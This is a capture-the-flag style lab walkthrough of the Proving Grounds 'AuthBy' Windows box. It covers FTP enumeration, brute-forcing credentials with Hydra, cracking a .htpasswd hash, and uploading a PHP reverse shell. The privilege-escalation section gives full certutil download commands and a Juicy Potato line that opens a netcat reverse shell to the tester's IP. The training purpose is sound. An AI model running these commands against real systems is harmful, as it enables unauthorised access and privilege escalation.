AuthBy
Source: Proving Grounds OS: Windows Community Rating: Hard
Enumeration & Reconnaissance
I started with the usual autorecon, which revealed the following open ports:
FTP (21)
HTTP (242)
3145, 3389
FTP allowed anonymous login, so I began there. Although I could only list directories and not download files, I noticed an "accounts" folder containing usernames:
offsec
admin
anonymous

The HTTP service, however, required credentials to proceed.
Gaining Initial Access
I used Hydra with the
-e nsr
flag to bruteforce the accounts. The admin account worked with the password "admin." While the admin credentials didn’t work on the HTTP site, they did grant access to FTP. Using the command:wget -r ftp://admin:admin@192.168.118.46

I downloaded the FTP files. After some digging and going in circles, I discovered a hidden file that I hadn't initially noticed, .htpasswd, which contained a hashed password for offsec. Running John against it, I cracked the hash, the password turned out to be "elite".



Now with offsec credentials, I logged into the HTTP server and noticed that the
index.html
there was identical to the one on the FTP server. This indicated that I could upload a shell via FTP (using the admin account) and then access it on HTTP with the offsec account. I created a PHP shell, after trying pentestmonkey’s version, which would connect briefly then crash, I switched to Ivan Sincek’s PHP shell, and it finally worked. I was in.


Privilege Escalation
Running
whoami /priv
revealed that I had the SeImpersonatePrivilege privilege.I checked system info to determine whether the server was 64-bit or 32-bit and then downloaded several PoCs. None worked until I resorted to Juicy Potato. I used certutil to download the necessary files:
certutil -urlcache -split -f http://192.168.45.231:901/Juicy.Potato.x86.exe
certutil -urlcache -split -f http://192.168.45.231:901/nc.exe
After uploading both nc and Juicy Potato, I tried running Juicy Potato with the default CLSID—it didn’t work at first, so I tested with different ones until one succeeded:
.\Juicy.Potato.x86.exe -t * -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\bin\apache\Apache2.2.21\nc.exe -e cmd.exe 192.168.45.231 5555" -c {e60687f7-01a1-40aa-86ac-db1cbf673334}


Lessons Learned
FTP Enumeration: Even with anonymous login, checking directories (like “accounts”) can reveal valid usernames.
Brute Force is Key: Using Hydra with the proper flags can uncover weak credentials quickly.
Hidden Files Matter: Don’t overlook hidden files on FTP servers—.htpasswd provided the offsec password here.
File Transfer Tools: Using
wget -r
to download all FTP files can save a lot of time.Shell Stability: If one PHP shell doesn’t work (like pentestmonkey’s), try alternatives until you get a stable connection.
Windows Nuances: Remember that on Windows, commands are executed with
.\
rather than./
, andrlwrap
can improve shell usability with nc.Certutil for File Uploads: Certutil is a useful tool for transferring files, as demonstrated when downloading Juicy Potato and nc.
Privilege Escalation with Juicy Potato: Leveraging SeImpersonate privileges through Juicy Potato can be a gate for Windows privilege escalation.
Last updated